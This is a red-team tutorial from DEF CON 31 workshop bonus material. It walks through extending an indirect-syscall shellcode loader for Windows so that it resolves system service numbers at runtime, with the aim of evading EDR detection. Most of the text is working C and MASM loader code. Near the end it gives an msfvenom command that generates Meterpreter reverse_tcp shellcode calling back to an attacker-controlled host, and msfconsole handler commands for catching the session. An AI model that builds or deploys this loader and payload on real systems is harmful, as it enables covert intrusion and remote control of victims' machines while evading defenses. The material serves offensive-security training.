
Indirect syscalls and dynamic SSN retrieval via APIs

In this three-part blog post series, I’m publicly sharing the bonus material from my DEF CON 31 workshop. This content is designed to help you deepen your understanding of (in)direct syscalls, enhance your custom shellcode loader, and progressively implement both the Hell's Gate and Halo's Gate techniques. By doing so, you will strengthen your skills in malware development, debugging, and EPP/EDR evasion.

Important: Before diving into the bonus chapters, I highly recommend reviewing all chapters of the main workshop material. The bonus content builds upon those foundations and assumes familiarity with key concepts introduced earlier.

In this first post, we’ll focus on extending the indirect syscall shellcode loader introduced in Chapter 7 of the main workshop. You’ll learn how to replace hardcoded syscall numbers (SSNs) with dynamically resolved SSNs at runtime using API-based techniques—an essential step toward making your loader more robust and stealthy in modern detection environments.

LAB Exercise: Dynamic SSN retrieval via APIs

In the first bonus chapter, we aim to enhance our indirect syscall loader. So far, our loader has had a key limitation: it only functions correctly on the specific Windows version used to extract and hardcode the System Service Numbers (SSNs) for the native functions NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

Why is this a problem?
To grasp the fundamentals of direct and indirect syscalls, we initially hardcoded SSNs into our assembly resource file. However, during red team operations, we typically don't know the exact Windows version running on a target system. As a result, relying on hardcoded SSNs makes our loader brittle and limits its operational scope.

To address this, our goal is to make the loader more dynamic and version-agnostic by retrieving the SSNs at runtime from ntdll.dll.

In this tutorial, we’ll achieve this dynamic SSN resolution using two familiar Windows APIs: GetModuleHandleA and GetProcAddress. You’ve already encountered these functions earlier when we used them to locate the address of the syscall instruction within a syscall stub. Now, we'll extend their use to dynamically locate the SSNs for the native functions referenced in our code.

The template code used in this tutorial is available here.

Shellcode Loader Coding 

As mentioned earlier, I strongly recommend completing Chapter 7 of the main course before proceeding. That foundational knowledge is essential, as this chapter builds upon it by extending the indirect syscall loader to retrieve System Service Numbers (SSNs) dynamically at runtime—eliminating the need to hardcode them.

Syscall and Return Flow

The goal is to execute the syscall and ret instructions from within the syscall stubs of the native functions in memory, specifically from ntdll.dll. This requires us to redirect execution from our loader to the appropriate syscall instruction in ntdll.dll at runtime.

To achieve this, the indirect syscall loader must:

  1. Prepare the CPU registers (mov r10, rcx and mov eax, SSN),

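  2. Then jump to the syscall instruction inside the corresponding stub in ntdll.dll, using an indirect jump through a stored address such as jmp QWORD PTR [sysAddrNtAllocateVirtualMemory].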

This redirection is handled via Windows API calls and structured as follows:

Required Steps Using Windows APIs

  1. Retrieve a handle to ntdll.dll at runtime using GetModuleHandleA.

  2. Use GetProcAddress to resolve the address of each target native function (such as NtAllocateVirtualMemory).

  3. Calculate the exact address of the syscall instruction within each function’s syscall stub by applying a known offset, then store it in a global function pointer for later use.

Handle to ntdll.dll

The first step is to acquire a module handle to ntdll.dll using GetModuleHandleA. This handle will be required to resolve function addresses. The code below is already part of the indirect syscall proof-of-concept:

    // Get a handle to the ntdll.dll library
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL) {
        // Print an error message and bail out.
        printf("Error: the specified module could not be found.\n");
        return 1; // Non-zero return value, since zero typically indicates success
    }

The returned HMODULE is the base address at which ntdll.dll is mapped into the process, which is necessary to dynamically resolve further offsets and addresses at runtime.

Start Address Native Function

Next, we use the following code to retrieve the start address of the target native function from the memory of ntdll.dll using the GetProcAddress function. The returned address is cast to UINT_PTR, a pointer-sized unsigned integer, and stored in a variable, which we will later use to calculate the location of the syscall instruction within the syscall stub.

Task

In the indirect syscall proof-of-concept (PoC), this code is implemented only for the native function NtAllocateVirtualMemory. Workshop attendees are expected to extend the implementation by following the same code pattern for the other native functions. The code scheme for NtAllocateVirtualMemory, shown in the section below, serves as a template for resolving and handling additional system calls such as NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

If you were unable to complete this section on your own, you can find the full code solution provided below for reference.

// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
    UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");

Memory Address Syscall Instruction

In the next step, we want to calculate the effective memory address of the syscall instruction within the syscall stub of the native function. To do this, we add a fixed offset to the start address of the function, which we retrieved in the previous step using GetProcAddress. Specifically, we add an offset of 0x12 (hexadecimal), that is, 18 bytes in decimal.

Why exactly 0x12? This offset is the distance from the beginning of the native function to the syscall instruction within its stub. It follows from the standard layout of an unhooked x64 syscall stub in ntdll.dll on recent Windows 10 and 11 builds: mov r10, rcx (3 bytes) at offset 0x00, mov eax, SSN (5 bytes) at 0x03, a test instruction (8 bytes) at 0x08, a jne (2 bytes) at 0x10, and then syscall at 0x12, followed by ret at 0x14.

With the offset of 0x12, we deliberately land on the syscall instruction and skip the mov r10, rcx and mov eax, SSN instructions of the stub, because our own assembly code has already executed them before the jump.
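To see where the 0x12 used in the code comes from, the following minimal sketch lays out the bytes of a typical unhooked x64 syscall stub and searches for the syscall; ret sequence. It is portable C that works on a byte array instead of live ntdll.dll memory. The names example_stub and find_syscall_offset are hypothetical, and the SSN 0x18 is only an example value.

```c
#include <assert.h>
#include <stddef.h>

/* Byte layout of an unhooked x64 syscall stub as commonly seen in ntdll.dll
 * on recent Windows 10/11 builds. The SSN 0x18 is only an example value. */
const unsigned char example_stub[] = {
    0x4C, 0x8B, 0xD1,                               /* +0x00 mov r10, rcx                 */
    0xB8, 0x18, 0x00, 0x00, 0x00,                   /* +0x03 mov eax, 18h (the SSN)       */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* +0x08 test byte ptr [7FFE0308h], 1 */
    0x75, 0x03,                                     /* +0x10 jne +3 (to int 2Eh)          */
    0x0F, 0x05,                                     /* +0x12 syscall                      */
    0xC3,                                           /* +0x14 ret                          */
    0xCD, 0x2E,                                     /* +0x15 int 2Eh                      */
    0xC3                                            /* +0x17 ret                          */
};

/* Returns the offset of the first "syscall; ret" byte sequence (0F 05 C3),
 * or -1 if the sequence does not occur within the first len bytes. */
int find_syscall_offset(const unsigned char *stub, size_t len)
{
    assert(stub != NULL);
    for (size_t i = 0; i + 2 < len; i++) {
        if (stub[i] == 0x0F && stub[i + 1] == 0x05 && stub[i + 2] == 0xC3) {
            return (int)i;
        }
    }
    return -1;
}
```

Calling find_syscall_offset(example_stub, sizeof example_stub) yields 0x12 for this layout. Searching for the byte pattern instead of adding a constant is one possible way to notice a stub whose layout differs, for example because it has been patched; the workshop code itself uses the fixed offset.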

Task

In the indirect syscall proof-of-concept (PoC), this logic is implemented only for the native function NtAllocateVirtualMemory. It is the responsibility of the workshop attendee to extend this implementation to the remaining native functions by following the same code pattern. The reference implementation for NtAllocateVirtualMemory is shown in the code section below and should be used as a template for functions such as NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

    // The syscall instruction is located some bytes into the syscall stub of the function.
    // Here it is assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the syscall instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;

If you were unable to complete this section on your own, you can find the full code solution provided below for reference.

    // The syscall instruction is located some bytes into the syscall stub of each function.
    // Here it is assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to each function's address to get the address of its syscall instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
    sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
    sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
    sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;

GetProcAddress - System Service Number (SSN)

In the next step, we want to calculate the effective memory address of the System Service Number (SSN) within the syscall stub of the native function. To do this, we add an offset of 4 bytes to the function’s start address, which we previously resolved using GetProcAddress.

Why 4 bytes?
This offset corresponds to the position of the SSN inside the mov eax, <SSN> instruction. In the typical structure of syscall stubs in ntdll.dll, mov r10, rcx occupies the first 3 bytes, and the mov eax, <SSN> instruction starts at offset 3 with its one-byte opcode (B8). The SSN follows as a 4-byte little-endian immediate value, so it begins 4 bytes after the function’s entry point.

By reading from precisely this location, we can extract the SSN value from the machine code at runtime and use it dynamically in the loader, without relying on hardcoded values.
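The read at offset 4 can be sketched in portable C as follows. This is a minimal sketch under stated assumptions, not the workshop implementation: it reads all four bytes of the immediate instead of only the first one, and it first checks that the stub really starts with mov r10, rcx; mov eax, imm32 (bytes 4C 8B D1 B8). The function name read_ssn is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Reads the SSN from the start of an x64 syscall stub.
 * Returns 1 and stores the SSN in *ssn on success. Returns 0 if fewer than
 * 8 bytes are available or the first four bytes are not
 * "mov r10, rcx; mov eax, imm32" (4C 8B D1 B8), e.g. because of a patch. */
int read_ssn(const unsigned char *stub, size_t len, uint32_t *ssn)
{
    static const unsigned char prologue[] = { 0x4C, 0x8B, 0xD1, 0xB8 };

    assert(stub != NULL && ssn != NULL);
    if (len < 8 || memcmp(stub, prologue, sizeof prologue) != 0) {
        return 0;
    }
    /* The imm32 operand occupies bytes 4..7 in little-endian order.
     * Assembling it byte by byte is independent of host endianness. */
    *ssn = (uint32_t)stub[4]
         | ((uint32_t)stub[5] << 8)
         | ((uint32_t)stub[6] << 16)
         | ((uint32_t)stub[7] << 24);
    return 1;
}
```

On Windows, the stub argument would be the address returned by GetProcAddress cast to const unsigned char*. Reading a single byte at offset 4 gives the same result only while the SSN is below 0x100; for a made-up SSN of 0x123 the single byte would be 0x23.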

Task

The following code demonstrates the concept in the context of the native function NtAllocateVirtualMemory. Workshop attendees are expected to apply the same approach to implement the logic for the remaining native functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

    // Retrieve the system service number (SSN) of the function. The SSN tells the kernel which system call to execute when the syscall instruction runs.
    // The SSN is assumed to start 4 bytes into the function. Note that this reads only its lowest byte, which is sufficient as long as the SSN is below 0x100.
    wNtAllocateVirtualMemory = ((unsigned char*)(pNtAllocateVirtualMemory + 4))[0];

If you were unable to complete this section on your own, you can refer to the full code solution provided below.

    // Retrieve the system service number (SSN) of each function. The SSN tells the kernel which system call to execute when the syscall instruction runs.
    // The SSN is assumed to start 4 bytes into the function. Note that this reads only its lowest byte, which is sufficient as long as the SSN is below 0x100.
    wNtAllocateVirtualMemory = ((unsigned char*)(pNtAllocateVirtualMemory + 4))[0];
    wNtWriteVirtualMemory = ((unsigned char*)(pNtWriteVirtualMemory + 4))[0];
    wNtCreateThreadEx = ((unsigned char*)(pNtCreateThreadEx + 4))[0];
    wNtWaitForSingleObject = ((unsigned char*)(pNtWaitForSingleObject + 4))[0];

Global Variables

To store the memory address of the syscall instruction for each native function, and to make this address accessible later within the assembly code in the syscalls.asm file, we declare a global variable for each syscall address. Each of these variables is declared as a UINT_PTR, a pointer-sized unsigned integer that can hold the corresponding memory address.

Task

As in the previous steps, this code in the proof-of-concept (PoC) for indirect syscalls has so far only been implemented for the native function NtAllocateVirtualMemory.

Workshop participants are expected to implement support for the remaining functions on their own — using the same code structure that is demonstrated in the following section for NtAllocateVirtualMemory.

// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;

If you were unable to complete this section on your own, you can refer to the full code solution provided below.

// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;

To store the system service number (SSN) of each native function, and to make it available later to the assembly code in the syscalls.asm file, we declare a global variable for each SSN. Each of these variables is defined as a DWORD, since the SSN is encoded as a 4-byte value in the syscall stub.

Task

Once again, based on the following code example—which demonstrates the concept using the native function NtAllocateVirtualMemory—the workshop attendee is expected to complete the implementation for the remaining native functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// Global DWORD (double words) that will hold the SSN
DWORD wNtAllocateVirtualMemory;

If you were unable to complete this section, the full code solution is provided below for your reference.

// Global DWORDs (double words) that will hold the SSNs
DWORD wNtAllocateVirtualMemory;
DWORD wNtWriteVirtualMemory;
DWORD wNtCreateThreadEx;
DWORD wNtWaitForSingleObject;
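Because every native function needs the same pair of globals, the per-function assignments could also be driven from a small table. The following is a hedged sketch of that idea and not part of the workshop code: the types syscall_entry and resolve_fn, the function resolve_all, and the fake_* test data are all hypothetical. uint32_t and uintptr_t stand in for DWORD and UINT_PTR so that the sketch compiles outside Windows, and only two of the four functions are listed to keep it short.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Callback that returns the start address of a named function, or NULL.
 * On Windows this would wrap GetProcAddress(hNtdll, name). */
typedef const unsigned char *(*resolve_fn)(const char *name);

/* One row per native function: export name plus the two globals it fills. */
typedef struct {
    const char *name;
    uint32_t   *ssn;           /* e.g. &wNtAllocateVirtualMemory       */
    uintptr_t  *syscall_addr;  /* e.g. &sysAddrNtAllocateVirtualMemory */
} syscall_entry;

/* Stand-ins for the loader's globals (DWORD and UINT_PTR on Windows). */
uint32_t  wNtAllocateVirtualMemory, wNtWaitForSingleObject;
uintptr_t sysAddrNtAllocateVirtualMemory, sysAddrNtWaitForSingleObject;

const syscall_entry demo_table[] = {
    { "NtAllocateVirtualMemory", &wNtAllocateVirtualMemory, &sysAddrNtAllocateVirtualMemory },
    { "NtWaitForSingleObject",   &wNtWaitForSingleObject,   &sysAddrNtWaitForSingleObject   },
};

/* Fills every entry that can be resolved; returns how many succeeded. */
size_t resolve_all(const syscall_entry *table, size_t count, resolve_fn resolve)
{
    size_t ok = 0;
    assert(table != NULL && resolve != NULL);
    for (size_t i = 0; i < count; i++) {
        const unsigned char *fn = resolve(table[i].name);
        if (fn == NULL) {
            continue;  /* export not found: leave the globals untouched */
        }
        *table[i].ssn          = fn[4];                 /* low byte of the SSN, as in the workshop code */
        *table[i].syscall_addr = (uintptr_t)fn + 0x12;  /* fixed offset to the syscall instruction      */
        ok++;
    }
    return ok;
}

/* Fake 24-byte stubs standing in for ntdll.dll memory (example SSNs). */
const unsigned char fake_alloc[24] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x18 };
const unsigned char fake_wait[24]  = { 0x4C, 0x8B, 0xD1, 0xB8, 0x04 };

/* Fake resolver used only for demonstration and testing. */
const unsigned char *fake_resolve(const char *name)
{
    if (strcmp(name, "NtAllocateVirtualMemory") == 0) return fake_alloc;
    if (strcmp(name, "NtWaitForSingleObject") == 0)   return fake_wait;
    return NULL;
}
```

The assembly code still refers to the named globals, so the table only replaces the repeated C assignments. Whether this is worth the indirection for four functions is a matter of taste.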

Header File

As with the direct syscall loader, we no longer rely on ntdll.dll to provide the function definitions for the native APIs we are using. However, since we still need to call these native functions, we must define their prototypes manually. To maintain clean and reusable code, we define the function signatures for all four native functions in a dedicated header file. In this case, the header file should be named syscalls.h.

Task

The syscalls.h file is not currently present in the syscall proof-of-concept (PoC) folder. Your task is to create a new header file named syscalls.h and implement the required function definitions within it. The necessary code for this header file is provided in the code section below.

Once created, you will need to include syscalls.h in the main source file to ensure the function prototypes are available during compilation.

If you wish to verify or explore the native function definitions manually, you can refer to the official Microsoft documentation. For example, the prototype for NtAllocateVirtualMemory can be found in the Windows API reference.

#ifndef _SYSCALLS_H  // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H  // Define _SYSCALLS_H

#include <windows.h>  // Include the Windows API header

// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS;  // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS;  // Define a pointer to NTSTATUS

// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,    // Handle to the process in which to allocate the memory
    PVOID* BaseAddress,      // Pointer to the base address
    ULONG_PTR ZeroBits,      // Number of high-order address bits that must be zero in the base address of the section view
    PSIZE_T RegionSize,      // Pointer to the size of the region
    ULONG AllocationType,    // Type of allocation
    ULONG Protect            // Memory protection for the region of pages
);

// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
    HANDLE ProcessHandle,     // Handle to the process in which to write the memory
    PVOID BaseAddress,        // Pointer to the base address
    PVOID Buffer,             // Buffer containing data to be written
    SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
    PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);

// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
    PHANDLE ThreadHandle,        // Pointer to a variable that receives a handle to the new thread
    ACCESS_MASK DesiredAccess,   // Desired access to the thread
    PVOID ObjectAttributes,      // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
    HANDLE ProcessHandle,        // Handle to the process in which the thread is to be created
    PVOID lpStartAddress,        // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
    PVOID lpParameter,           // Pointer to a variable to be passed to the thread
    ULONG Flags,                 // Flags that control the creation of the thread
    SIZE_T StackZeroBits,        // Number of high-order address bits that must be zero in the stack pointer
    SIZE_T SizeOfStackCommit,    // The size of the stack that must be committed at thread creation
    SIZE_T SizeOfStackReserve,   // The size of the stack that must be reserved at thread creation
    PVOID lpBytesBuffer          // Pointer to a variable that receives any output data from the system
);

// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
    HANDLE Handle,          // Handle to the object to be waited on
    BOOLEAN Alertable,      // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
    PLARGE_INTEGER Timeout  // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);

#endif // _SYSCALLS_H  // End of the _SYSCALLS_H definition

Assembly Instructions

As before, we do not call the native functions exported by ntdll.dll directly. Instead, we implement the first part of each syscall stub ourselves and replace the previously hardcoded system service number (SSN) with the corresponding variable that dynamically holds the SSN for each native function. Only the syscall and ret instructions are executed inside ntdll.dll.

The following code demonstrates this concept using the native function NtAllocateVirtualMemory. Workshop attendees are expected to follow the same approach and complete the implementation for the remaining functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

EXTERN wNtAllocateVirtualMemory:DWORD               ; Holds the dynamically retrieved SSN for NtAllocateVirtualMemory
EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; Holds the address of the syscall instruction of NtAllocateVirtualMemory in ntdll.dll

.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Copy the first argument from rcx to r10. The syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
    mov eax, wNtAllocateVirtualMemory               ; Load the dynamically retrieved SSN into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the syscall instruction inside ntdll.dll.
NtAllocateVirtualMemory ENDP                        ; End of the procedure.
     
END  ; End of the module

Task

Your task is to add the syscalls.asm file to the indirect syscall loader project as a resource (existing item), and then complete both the assembly code and the corresponding C code for the remaining three native APIs: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

If you are unable to complete the assembly code yourself at this time, you can refer to the solution provided and copy the relevant assembly routines from the syscalls.asm file used in the direct syscall loader proof-of-concept (PoC). Paste the required functions into the syscalls.asm file of the indirect loader project to proceed.

EXTERN wNtAllocateVirtualMemory:DWORD               ; Holds the dynamically retrieved SSN for NtAllocateVirtualMemory
EXTERN wNtWriteVirtualMemory:DWORD                  ; Holds the dynamically retrieved SSN for NtWriteVirtualMemory
EXTERN wNtCreateThreadEx:DWORD                      ; Holds the dynamically retrieved SSN for NtCreateThreadEx
EXTERN wNtWaitForSingleObject:DWORD                 ; Holds the dynamically retrieved SSN for NtWaitForSingleObject

EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; Address of the syscall instruction of NtAllocateVirtualMemory in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD            ; Address of the syscall instruction of NtWriteVirtualMemory in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD                ; Address of the syscall instruction of NtCreateThreadEx in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD           ; Address of the syscall instruction of NtWaitForSingleObject in ntdll.dll.


.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Copy the first argument from rcx to r10. The syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
    mov eax, wNtAllocateVirtualMemory               ; Load the dynamically retrieved SSN into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the syscall instruction inside ntdll.dll.
NtAllocateVirtualMemory ENDP                        ; End of the procedure.


; Same pattern for the NtWriteVirtualMemory syscall
NtWriteVirtualMemory PROC
    mov r10, rcx
    mov eax, wNtWriteVirtualMemory
    jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP


; Same pattern for the NtCreateThreadEx syscall
NtCreateThreadEx PROC
    mov r10, rcx
    mov eax, wNtCreateThreadEx
    jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP


; Same pattern for the NtWaitForSingleObject syscall
NtWaitForSingleObject PROC
    mov r10, rcx
    mov eax, wNtWaitForSingleObject
    jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP

END  ; End of the module

Microsoft Macro Assembler (MASM)

The necessary assembly routines have already been implemented in the syscalls.asm file. However, to ensure this code is correctly interpreted and integrated within the indirect syscall proof-of-concept (PoC), a few additional steps must be performed. These steps are not included in the downloadable PoC by default and must be completed manually by the student.

Task

First, you need to enable support for the Microsoft Macro Assembler (MASM) in the Visual Studio project. This can be done by navigating to Build Dependencies > Build Customizations and checking the option for masm (.asm) to ensure that assembly files are correctly compiled and linked during the build process.

Task

Next, you need to set the item type of the syscalls.asm file to Microsoft Macro Assembler. If this is not configured correctly, Visual Studio will not compile the assembly file, resulting in unresolved symbol errors for the native API stubs used in the indirect syscall loader.

Additionally, ensure that the Excluded From Build property is set to No, and the Content property is set to Yes. This ensures the file is included in the build process and properly embedded or referenced as needed.

Meterpreter Shellcode

Task

We generate our Meterpreter shellcode using msfvenom on Kali Linux. For this example, we will create a staged Meterpreter shellcode targeting x64 architecture using the following command.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

The generated shellcode can then be inserted into the indirect syscall loader proof-of-concept (PoC) by replacing the existing placeholder defined as an unsigned char array. After making this change, the PoC should be compiled as an x64 Release build to ensure compatibility with the 64-bit shellcode.

MSF-Listener

Task

Before testing the functionality of the indirect syscall loader, we need to set up a listener in msfconsole to handle the incoming Meterpreter session.

msf> use exploit/multi/handler
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set lhost IPv4_Redirector_or_IPv4_Kali
msf> set lport 80 
msf> set exitonsession false
msf> run

Once the listener has been successfully started, you can execute the compiled indirect syscall loader. If everything is configured correctly, you should receive an incoming command and control session in msfconsole.

Shellcode Loader Analysis

The first step is to execute your indirect syscall loader and verify that the .exe is running and that a stable Meterpreter command and control (C2) session has been established. Once confirmed, open x64dbg and attach it to the running process.

Note: If you choose to open the indirect syscall loader directly in x64dbg (instead of attaching to a running instance), you must manually start the program execution by running the initial assembly instructions to reach the point where the loader is active.

Task

Now we want to analyze the loader’s behavior using x64dbg and compare the results with the variant that uses hardcoded System Service Numbers (SSNs).

What differences should we expect?

The first immediately noticeable difference is the use of global variables:
In this version of the indirect syscall loader, additional global variables are present to hold the dynamically retrieved SSNs at runtime. Because they are written at runtime, these variables live in a writable section (typically .data) and are clearly visible in the debugger, either as readable DWORD values or as references in a wrapper function.

In contrast, the hardcoded variant embeds the SSNs directly in the assembly instructions. For example, you will typically see a mov eax, <SSN> instruction with a constant immediate value right before the syscall instruction. There are no global memory locations from which the SSN is loaded — it is a fixed part of the machine code and can be directly observed during disassembly.
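The difference also shows up in the instruction bytes you see in the disassembly. As a rough sketch, assuming the assembler emits the usual x64 encodings, a hardcoded SSN appears as B8 followed by a 4-byte immediate (mov eax, imm32), while a load from a global variable typically appears as 8B 05 followed by a 4-byte RIP-relative displacement (mov eax, [rip+disp32]). The enum and function names below are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

typedef enum {
    SSN_UNKNOWN = 0,
    SSN_IMMEDIATE,    /* B8 imm32     : mov eax, imm32 (hardcoded SSN)        */
    SSN_FROM_GLOBAL   /* 8B 05 disp32 : mov eax, [rip+disp32] (SSN in memory) */
} ssn_source;

/* Classifies the instruction that loads eax, given a pointer to its first
 * byte (in our wrapper this is the instruction right after mov r10, rcx). */
ssn_source classify_ssn_load(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    if (len >= 5 && code[0] == 0xB8) {
        return SSN_IMMEDIATE;
    }
    if (len >= 6 && code[0] == 0x8B && code[1] == 0x05) {
        return SSN_FROM_GLOBAL;
    }
    return SSN_UNKNOWN;
}
```

In x64dbg you would read these bytes off the wrapper procedure by eye; the function only makes the two patterns explicit.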


We can also observe that the SSNs are no longer hardcoded into the assembly. Instead, they are dynamically retrieved at runtime by resolving the start address of each native function using GetProcAddress and then adding the required 4-byte offset to locate the SSN within the syscall stub.

Additionally, you will notice the presence of global variables, prefixed with w in our code, which are used to store the dynamically retrieved SSNs. These variables play a central role in making the loader version-independent and more flexible compared to the static, hardcoded approach.

Summary

We transitioned from using hardcoded system service numbers (SSNs) to dynamically retrieving them at runtime via GetProcAddress. These dynamically resolved SSNs are stored in globally declared variables, allowing us to reference them flexibly throughout the loader.

This dynamic approach provides significantly greater flexibility when targeting different versions of Windows, as it eliminates the dependency on fixed SSN values that vary across builds and updates of the operating system.

Limitations

Depending on the EDR in place, this approach may not always be effective. If functions like GetModuleHandleA and GetProcAddress are hooked, dynamic SSN retrieval can be detected or blocked. This introduces a classic chicken-and-egg problem: while we use direct or indirect syscalls to bypass user-mode hooks, the mechanism we rely on to retrieve SSNs—namely, these same API functions—may already be compromised. To address this challenge, we explore alternative techniques in the next bonus chapter.

If you’re interested in further enhancing your (in)direct syscall shellcode loader by dynamically retrieving SSNs without relying on potentially hooked Windows APIs, refer to Bonus Chapter 2 from the DEF CON 31 workshop. There, we demonstrate how to use a combination of PEB walking and Export Address Table (EAT) parsing to extract the required information directly from memory.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 23.05.25 08:47:28